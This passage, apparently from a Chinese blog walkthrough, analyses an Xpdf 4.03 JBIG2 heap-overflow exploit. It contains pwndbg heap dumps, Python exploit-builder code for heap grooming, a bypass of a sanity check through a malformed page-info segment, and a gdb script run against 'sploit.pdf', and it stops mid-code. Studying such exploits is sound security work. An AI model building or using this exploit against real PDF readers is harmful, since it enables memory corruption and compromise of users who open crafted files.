0x7ffff7ad8f30 (main_arena+912) ◂— 0x5555557f5f70</span><br><span class="line">0x380: 0x5555557c69a0 —▸ 0x7ffff7ad8f70 (main_arena+976) ◂— 0x5555557c69a0</span><br><span class="line">0x390: 0x5555557d7c70 —▸ 0x7ffff7ad8f80 (main_arena+992) ◂— 0x5555557d7c70 /* &#x27;p|&#125;UUU&#x27; */</span><br><span class="line">0x3b0: 0x5555557c54c0 —▸ 0x7ffff7ad8fa0 (main_arena+1024) ◂— 0x5555557c54c0</span><br><span class="line">0x3f0: 0x5555557bd580 —▸ 0x7ffff7ad8fe0 (main_arena+1088) ◂— 0x5555557bd580</span><br><span class="line">largebins</span><br><span class="line">0x580: 0x5555557cc2b0 —▸ 0x555555797d80 —▸ 0x7ffff7ad9050 (main_arena+1200) ◂— 0x5555557cc2b0</span><br><span class="line">0x600: 0x5555557c7db0 —▸ 0x7ffff7ad9070 (main_arena+1232) ◂— 0x5555557c7db0</span><br><span class="line">0x640: 0x5555557be580 —▸ 0x7ffff7ad9080 (main_arena+1248) ◂— 0x5555557be580</span><br><span class="line">0x780: 0x5555557ea9f0 —▸ 0x5555557cb9e0 —▸ 0x7ffff7ad90d0 (main_arena+1328) ◂— 0x5555557ea9f0</span><br><span class="line">0x800: 0x5555557985d0 —▸ 0x7ffff7ad90f0 (main_arena+1360) ◂— 0x5555557985d0</span><br><span class="line">0x840: 0x5555557cdc00 —▸ 0x7ffff7ad9100 (main_arena+1376) ◂— 0x5555557cdc00</span><br><span class="line">0x900: 0x5555557bdba0 —▸ 0x7ffff7ad9130 (main_arena+1424) ◂— 0x5555557bdba0</span><br><span class="line">0x940: 0x5555557e77f0 —▸ 0x5555557e9b00 —▸ 0x7ffff7ad9140 (main_arena+1440) ◂— 0x5555557e77f0</span><br><span class="line">0x980: 0x5555557d86b0 —▸ 0x5555557ebea0 —▸ 0x7ffff7ad9150 (main_arena+1456) ◂— 0x5555557d86b0</span><br><span class="line">0x9c0: 0x555555795c40 —▸ 0x7ffff7ad9160 (main_arena+1472) ◂— 0x555555795c40 /* &#x27;@\\yUUU&#x27; */</span><br><span class="line">0xa00: 0x5555557cd080 —▸ 0x7ffff7ad9170 (main_arena+1488) ◂— 0x5555557cd080</span><br><span class="line">0xa40: 0x555555799440 —▸ 0x5555557d1e40 —▸ 0x7ffff7ad9180 (main_arena+1504) ◂— 0x555555799440</span><br><span class="line">0xac0: 0x5555557e83c0 —▸ 0x5555557e6100 —▸ 0x7ffff7ad91a0 (main_arena+1536) ◂— 0x5555557e83c0</span><br><span class="line">0xb00: 0x5555557d2a20 —▸ 0x7ffff7ad91b0 (main_arena+1552) ◂— 0x5555557d2a20 /* &#x27; *&#125;UUU&#x27; */</span><br><span class="line">0xb40: 0x5555557e6c70 —▸ 0x5555557feb50 —▸ 0x7ffff7ad91c0 (main_arena+1568) ◂— 0x5555557e6c70 /* &#x27;pl~UUU&#x27; */</span><br><span class="line">0xc40: 0x5555557eb210 —▸ 0x5555557e8ea0 —▸ 0x7ffff7ad9200 (main_arena+1632) ◂— 0x5555557eb210</span><br><span class="line">0xe00: 0x5555557c00c0 —▸ 0x5555557b9630 —▸ 0x5555557c4590 —▸ 0x7ffff7ad9210 (main_arena+1648) ◂— 0x5555557c00c0</span><br><span class="line">0x1400: 0x5555557b5420 —▸ 0x7ffff7ad9240 (main_arena+1696) ◂— 0x5555557b5420 /* &#x27; T&#123;UUU&#x27; */</span><br><span class="line">0x1600: 0x5555557ce770 —▸ 0x7ffff7ad9250 (main_arena+1712) ◂— 0x5555557ce770</span><br><span class="line">0x1800: 0x5555557bae40 —▸ 0x7ffff7ad9260 (main_arena+1728) ◂— 0x5555557bae40</span><br><span class="line">0x2600: 0x5555557b6aa0 —▸ 0x5555557c1110 —▸ 0x7ffff7ad92d0 (main_arena+1840) ◂— 0x5555557b6aa0</span><br><span class="line">0x2a00: 0x55555579af20 —▸ 0x7ffff7ad92f0 (main_arena+1872) ◂— 0x55555579af20</span><br><span class="line">0x3000: 0x5555557d3d80 —▸ 0x5555557d9b60 —▸ 0x5555557c88a0 —▸ 0x7ffff7ad9300 (main_arena+1888) ◂— 0x5555557d3d80</span><br></pre></td></tr></table></figure><p>这些碎片堆块对于接下来的堆风水是相当不利的，因此需要将其全部分配掉。这里使用的是 <code>PageInfoSeg</code> 来分配内存，因为通读代码可以发现 <code>JBIG2Stream::readPageInfoSeg</code> 函数<strong>除了分配一个堆块以外，没有产生其他任何影响</strong>：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">DummyAlloc</span>(<span class="params">size</span>):</span><br><span class="line">    <span class="keyword">return</span> PageInfo(<span class="number">233</span>, w=<span class="number">8</span>, h=size)</span><br><span class="line"></span><br><span class="line">global_file = [</span><br><span class="line">    SymbolDict(<span class="number">0</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * <span class="number">0x10000</span>),</span><br><span class="line">    SymbolDict(<span class="number">1</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * (size_to_overflow // <span class="number">8</span>)),</span><br><span class="line">    SymbolDict(<span class="number">2</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)]),</span><br><span class="line">    <span class="comment"># Heap grooming: eat every chunk in &#123;tcache,fast,small,large,unsorted&#125; bins</span></span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">128</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>, <span class="number">0x1000</span>, <span class="number">0x10</span>)],</span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">16</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1000</span>, <span class="number">0x10000</span>, <span class="number">0x100</span>)],</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>分配后的 bin 如下所示，可以看到清爽了不少：</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">bins</span></span><br><span class="line">tcachebins</span><br><span class="line">empty</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0x20 [corrupted]</span><br><span class="line">FD: 0x55555579d9f0 —▸ 0x5555557d2860 —▸ 0x555555798db0 —▸ 0x5555557d7fe0 —▸ 0x5555557d7c30 ◂— ...</span><br><span class="line">BK: 0x5555557f96e0 —▸ 0x5555557f9300 —▸ 0x5555557fb200 —▸ 0x5555557fdf40 —▸ 0x5555557fd390 ◂— ...</span><br><span class="line">largebins</span><br><span class="line">empty</span><br></pre></td></tr></table></figure><p>那么接下来的问题是，如何设计堆风水？exploit 给了一个清晰明了的做法：</p><blockquote><p>利用 global segment GList <strong>满则扩增</strong>的特性创建堆空洞，进而让其他结构体来占据这些内存空洞，完成堆风水。</p></blockquote><p>什么意思呢？我们看看 GList 的一些类方法：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">GList::<span class="built_in">GList</span>() &#123;</span><br><span class="line">  size = <span class="number">8</span>;</span><br><span class="line">  data = (<span class="type">void</span> **)<span class="built_in">gmallocn</span>(size, <span class="built_in">sizeof</span>(<span class="type">void</span>*));</span><br><span class="line">  length = <span class="number">0</span>;</span><br><span class="line">  inc = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">GList::append</span><span class="params">(<span class="type">void</span> *p)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (length &gt;= size) &#123;</span><br><span class="line">    <span class="built_in">expand</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  data[length++] = p;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">GList::expand</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  size += (inc &gt; <span class="number">0</span>) ? inc : size;</span><br><span class="line">  data = (<span class="type">void</span> **)<span class="built_in">greallocn</span>(data, size, <span class="built_in">sizeof</span>(<span class="type">void</span>*));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看到，初始时 <strong>GList size 为 8</strong>。当 GList 中元素个数超过容量时，GList 容量将会<strong>双倍扩增</strong>。也就是说，初始时的 size 为 8，下次扩增后的 size 是 16，再下次扩增后的 size 为 32，再下下次的 size 为 64（单位，个指针）。</p><p>扩增所使用的堆函数为 <code>realloc</code>，即当 GList 容量扩增后，原先那个堆块<strong>将被释放</strong>。同时又因为上面已经将其余全部小堆块全都分配出去了，因此 <strong>GList 容量扩增所分配的新堆块，一定来自于 top chunk</strong>，这就能保证每次 GList 容量扩张时，<strong>新堆块的分配顺序一定是从低地址向高地址分配</strong>。</p><p>因此尝试让 global segment GList 多次扩展，从 8 扩展至我们所需要的最终大小 64：</p><blockquote><p>代码中的 glist_capacity == 32。个人认为这个数表示的是<strong>第几次 append global GList 时会扩充 GList size 至 64</strong>。</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">global_file = [</span><br><span class="line">    SymbolDict(<span class="number">0</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * <span class="number">0x10000</span>),</span><br><span class="line">    SymbolDict(<span class="number">1</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * (size_to_overflow // <span class="number">8</span>)),</span><br><span class="line">    SymbolDict(<span class="number">2</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)]),</span><br><span class="line">    <span class="comment"># Heap grooming: eat every chunk in &#123;tcache,fast,small,large,unsorted&#125; bins</span></span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">128</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>, <span class="number">0x1000</span>, <span class="number">0x10</span>)],</span><br><span class="line">    [[DummyAlloc(size)] * <span class="number">16</span> <span class="keyword">for</span> size <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1000</span>, <span class="number">0x10000</span>, <span class="number">0x100</span>)],</span><br><span class="line">    <span class="comment"># ------------ 开始尝试堆风水 ------------</span></span><br><span class="line">    [SymbolDict(i, []) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>, glist_capacity // <span class="number">2</span>)],</span><br><span class="line">    <span class="comment"># Now most bins are empty, except tcachebin 0x20, 0x50 and small bin 0x20</span></span><br><span class="line">    <span class="comment"># This triggers GList::expand(), 0x80 -&gt; 0x100; allocates from top chunk</span></span><br><span class="line">    SymbolDict(glist_capacity // <span class="number">2</span>, []),</span><br><span class="line">    [SymbolDict(i, []) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(glist_capacity // <span class="number">2</span> + <span class="number">1</span>, glist_capacity)],</span><br><span class="line">    <span class="comment"># 0x100 -&gt; 0x200, the old chunk should fall in tcache</span></span><br><span class="line">    SymbolDict(<span class="number">100</span>, []),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>global segment 的堆风水执行结束后，其堆布局大致如下：</p><blockquote><p>注意 segNum 从 3 开始的 Symbol Dict，其结构体所分配的堆块（chunk size = 0x40）也是直接来自于 top chunk 。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address --------------------------------------------</span></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">    一些其他的堆块分配，包括 </span></span><br><span class="line"><span class="comment">    1. size=8 的 global GList backing store</span></span><br><span class="line"><span class="comment">    2. DummyAlloc</span></span><br><span class="line"><span class="comment">    3. SymbolDict0、1、2</span></span><br><span class="line"><span class="comment">    4. ...</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line">size=<span class="number">16</span> 的 global GList backing store 堆空洞</span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line">size=<span class="number">32</span> 的 global GList backing store 堆空洞</span><br><span class="line">SymbolDict17<span class="number">-32</span>;</span><br><span class="line">size=<span class="number">64</span> 的 global GList backing store <span class="comment">// 最终的 GList data 堆位置，这里可不是堆空洞</span></span><br><span class="line"><span class="comment">// high address -------------------------------------------</span></span><br></pre></td></tr></table></figure><p>接下来，只需分别</p><ul><li><p>让 pageBitmap backing store 占据 size=16 的 Glist 堆空洞</p></li><li><p>让解析 TextRegion 时创建的 syms 指针数组占据 size=32 的 Glist 堆空洞</p></li></ul><p>即可完成堆布局。</p><blockquote><p>pageBitmap 的 JBIG2Bitmap 结构体堆位置在下文中将会说明。</p></blockquote><p>最后贴个 gdb script，可以使用该 gdbscript 辅助观察内存布局：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">file ../../xpdf-4.03/build/xpdf/pdftohtml</span><br><span class="line">aslr off</span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br><span class="line"></span><br><span class="line">b readSymbolDictSeg <span class="keyword">if</span> segNum==8</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in read symbol 8\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)segments</span><br><span class="line">    <span class="comment"># tcachebins</span></span><br><span class="line">    bins</span><br><span class="line">    <span class="comment"># c</span></span><br><span class="line">end</span><br><span class="line">b readSymbolDictSeg <span class="keyword">if</span> segNum==16</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in read symbol 16\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)segments</span><br><span class="line">    <span class="comment"># tcachebins</span></span><br><span class="line">    bins</span><br><span class="line">    <span class="comment"># c</span></span><br><span class="line">end</span><br><span class="line">b readSymbolDictSeg <span class="keyword">if</span> segNum==100</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in read symbol 32\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)segments</span><br><span class="line">    <span class="comment"># tcachebins</span></span><br><span class="line">    bins</span><br><span class="line">    </span><br><span class="line">    tb JBIG2Stream.cc:1481</span><br><span class="line">    commands</span><br><span class="line">        <span class="built_in">printf</span> <span class="string">&quot;after finish globalSegments addr is:0x%llx\n&quot;</span>, segments</span><br><span class="line">        p *(GList *)segments</span><br><span class="line">        <span class="comment"># tcachebins</span></span><br><span class="line">        bins</span><br><span class="line">    end</span><br><span class="line">    <span class="comment"># replace finish and print info</span></span><br><span class="line">    <span class="comment"># c</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b JBIG2Stream.cc:2072 <span class="keyword">if</span> segNum==102</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;sakura in TextRegion to trigger oob\n&quot;</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;numSyms after underoverflow is:0x%llx\n&quot;</span>, numSyms</span><br><span class="line">    <span class="built_in">set</span> <span class="variable">$oob_syms</span> = <span class="variable">$rax</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;undersized syms buffer addr is:0x%llx\n&quot;</span>, <span class="variable">$oob_syms</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;globalSegments addr is:0x%llx\n&quot;</span>, globalSegments</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;segments GList backing buffer\n&quot;</span></span><br><span class="line">    p *(GList *)globalSegments</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;pageBitmap addr is :0x%llx\n&quot;</span>, pageBitmap</span><br><span class="line">    p *(JBIG2Bitmap *)pageBitmap</span><br><span class="line">    bins</span><br><span class="line"></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">r sploit.pdf output</span><br></pre></td></tr></table></figure><h4 id="b-占据堆空洞">b. 占据堆空洞</h4><p>global stream 中的解析操作是为了创建堆空洞，那 main stream 的解析操作就是为了占据堆空洞。</p><p>承接上文，接下来我们试着分配一个全新的 pageBitmap 结构，并让其 backing store 占据 size=16 的 Glist 空洞：</p><blockquote><p>代码中的 GLIST_DATA_SIZE = 0x200，表示 size=64 时 global glist data 占据的字节数。</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">page0 = [</span><br><span class="line">    <span class="comment"># Make sure page bitmap buffer uses the second-last globalSegments data buffer so</span></span><br><span class="line">    <span class="comment"># that it lies just before syms, at a fixed offset.</span></span><br><span class="line">    <span class="comment"># GLIST_DATA_SIZE // 4，表示占据 size=16 时的 glist 堆空洞</span></span><br><span class="line">    PageInfo(<span class="number">101</span>, w=<span class="number">8</span> * (GLIST_DATA_SIZE // <span class="number">4</span>), h=<span class="number">1</span>),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>此时堆布局如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address --------------------------------------------</span></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">    一些其他的堆块分配，包括 </span></span><br><span class="line"><span class="comment">    1. size=8 的 global GList backing store</span></span><br><span class="line"><span class="comment">    2. DummyAlloc</span></span><br><span class="line"><span class="comment">    3. SymbolDict0、1、2</span></span><br><span class="line"><span class="comment">    4. ...</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 注意这里！</span></span><br><span class="line">pageBitmap backing buffer <span class="comment">// size=16 的 global GList backing store 堆空洞</span></span><br><span class="line">    </span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line"></span><br><span class="line">size=<span class="number">32</span> 的 global GList backing store 堆空洞</span><br><span class="line">    </span><br><span class="line">SymbolDict17<span class="number">-32</span>;</span><br><span class="line"></span><br><span class="line">size=<span class="number">64</span> 的 global GList backing store; <span class="comment">// 最终的 GList data 堆位置，这里可不是堆空洞</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 注意这里！</span></span><br><span class="line">pageBitmap JBIG2Bitmap; 结构体 </span><br><span class="line">    </span><br><span class="line"><span class="comment">// high address -------------------------------------------</span></span><br></pre></td></tr></table></figure><p>这里简单说一下 pageBitmap <strong>结构本身的堆块分配(JBIG2Bitmap)</strong>，由于其 size 0x20 在堆链上找不到可分配的堆块，因此将<strong>仍然从 top chunk 中分配</strong>，故其地址位于 size=64 的 Glist 位置的<strong>高地址处</strong>，满足堆风水要求。</p><p>接下来需要在解析 TextRegion 时继续占用 size=32 的 Glist 堆空洞。因此 TextRegion 中创建的用户内存大小必须是 <code>syms_size = GLIST_DATA_SIZE // 2</code>，正好对应到 size=32 的 Glist 堆空洞大小。</p><p>但在做进一步的利用之前，我们需要绕过一个<a href="https://fossies.org/diffs/xpdf/4.02_vs_4.03/xpdf/JBIG2Stream.cc-diff.html">比较有趣的 sanity check</a>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sanity check: if the w/h/x/y values are way out of range, it likely</span></span><br><span class="line"><span class="comment">// indicates a damaged JBIG2 stream</span></span><br><span class="line"><span class="keyword">if</span> (w / <span class="number">10</span> &gt; pageW || h / <span class="number">10</span> &gt; pageH ||</span><br><span class="line">    x / <span class="number">10</span> &gt; pageW || y / <span class="number">10</span> &gt; pageH) &#123;</span><br><span class="line">    <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(),</span><br><span class="line">          <span class="string">&quot;Bad size or position in JBIG2 text region segment&quot;</span>);</span><br><span class="line">    done = gTrue;</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>xpdf-4.03/xpdf/JBIG2Stream.cc</code> 中多次出现上面的这种 sanity check，判断当前正在处理的 w\h\x\y 是否越过了当前的 pageW 和 pageH（两个 JBIG2Stream 类的成员变量，用于表示当前 page 的宽度和高度），如果越界则说明当前解析过程可能存在问题，那么则立即停止解析当前 segment。</p><p>看上去好像这个 sanity check 没啥问题…</p><p>但实际上，我们回过头看看 <code>readPageInfoSeg</code> 函数的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readPageInfoSeg</span><span class="params">(Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Guint xRes, yRes, flags, striping;</span><br><span class="line">    <span class="comment">// 从不受信任的流中直接读入 pageW 和 pageH</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">readULong</span>(&amp;pageW) || !<span class="built_in">readULong</span>(&amp;pageH) ||</span><br><span class="line">        !<span class="built_in">readULong</span>(&amp;xRes) || !<span class="built_in">readULong</span>(&amp;yRes) ||</span><br><span class="line">        !<span class="built_in">readUByte</span>(&amp;flags) || !<span class="built_in">readUWord</span>(&amp;striping))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">goto</span> eofError;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果 pageW 和 pageH 过大</span></span><br><span class="line">    <span class="keyword">if</span> (pageW == <span class="number">0</span> || pageH == <span class="number">0</span> || pageW &gt; INT_MAX / pageW)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 则直接退出 pageInfoSeg 的解析</span></span><br><span class="line">        <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(), <span class="string">&quot;Bad page size in JBIG2 stream&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们可以非常容易的发现， 即便 <code>readPageInfoSeg</code> 函数中检测到了 <code>pageW</code> 和 <code>pageH</code> 的异常，但也只是简单的退出掉当前 seg 的解析，<strong>保留了畸形 <code>pageW</code> 和 <code>pageH</code> 的值在 JBIG2Stream 类成员中</strong>。</p><p>这样，我们可以尝试插入一个超大 pageW 和 pageH 的 PageInfoSeg，从而污染这两个字段为超大值，bypass 后续所有新增加的 sanity check：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">page0 = [</span><br><span class="line">    <span class="comment"># Make sure page bitmap buffer uses the second-last globalSegments data buffer so</span></span><br><span class="line">    <span class="comment"># that it lies just before syms, at a fixed offset.</span></span><br><span class="line">    PageInfo(<span class="number">101</span>, w=<span class="number">8</span> * (GLIST_DATA_SIZE // <span class="number">4</span>), h=<span class="number">1</span>),</span><br><span class="line">    <span class="comment"># Change pageH and pageW to a large value to bypass a (seriously funny) sanity</span></span><br><span class="line">    <span class="comment"># check introduced in Xpdf 4.03; Xpdf would report an error without allocating</span></span><br><span class="line">    <span class="comment"># a new pageBitmap, but won&#x27;t stop parsing the JBIG2 stream, which is exactly what</span></span><br><span class="line">    <span class="comment"># we want.</span></span><br><span class="line">    PageInfo(<span class="number">101</span>, w=<span class="number">1919114514</span>, h=<span class="number">1919114514</span>),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>bypass 掉这个 sanity check 后，接下来就可以尝试创建 TextRegionSeg 来进行堆溢出了。承接上面所说的，这里所创建的 TextRegionSeg 需要满足几种要求：</p><ul><li>其内部创建的 syms 大小必须是 syms_size（这个值上面已经说明了）</li><li>向堆块写入的数据大小为 <code>size_to_overflow</code> 个字节，即实际写 <code>size_to_overflow // 8</code> 个指针</li></ul><p>因此接下来在 main stream 中，需要合理组合 TextRegion 所引用的 Symbol Dict 大小：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 